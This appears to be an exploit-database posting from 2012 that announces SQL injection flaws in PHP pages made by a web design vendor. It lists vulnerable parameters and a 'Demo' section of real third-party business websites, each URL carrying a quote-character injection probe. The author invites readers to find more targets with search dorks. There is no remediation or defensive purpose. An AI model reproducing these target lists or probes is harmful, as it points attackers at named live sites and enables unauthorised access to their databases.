Aholattafun Creative Solutions SQL Injection Vulnerabilities



EKU-ID: 2163 CVE: OSVDB-ID:
Author: Becax Published: 2012-05-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


================================================
# Exploit Title: Aholattafun Creative Solutions SQL Injection Vulnerabilities
# Author: Becax
# Home : CrimeIRCD
# Vendor :http://www.aholattafun.com/
---------------------------------------------------------------------!
# Email : tomier2010@yahoo.com
# Category: [webapps]
# Version: n/a
# Google dork: : think about :D
# Tested on: win XP
---------------------------------------------------------------------!
# Exploit 1 : http://localhost/view-category.php?cat=1
# exploit 2: http://localhost/index-view-calendar-detail.php?id=944
# Exploit 3: http://localhost/viewproduct.php?product=141
# Exploit 4: more, you can make experiment for that
-----------------------------------------------------------------------!
Demo :
http://dev.aholattafun.com/deployed/old%28movedtolive%29_northern-dynamics/view-category.php?cat=1%27
http://www.northerndynamics.ca/view-category.php?cat=1%27
http://www.lapatisserie.ca/view-category.php?cat=13%27
http://www.tworiversfht.ca/index-view-calendar-detail.php?id=944%27
http://www.reidcandyandnutshop.com/viewproduct.php?product=141%27

---------------------------------------------------------------------!

Special thanks :
PusP my lovely, Adhel my cousin ,CrimeIRCD staff, AHA,Hew, All member #unix, and 1337day & Google

Let's get do the work ! hehe
----------------------------------------------------------------------!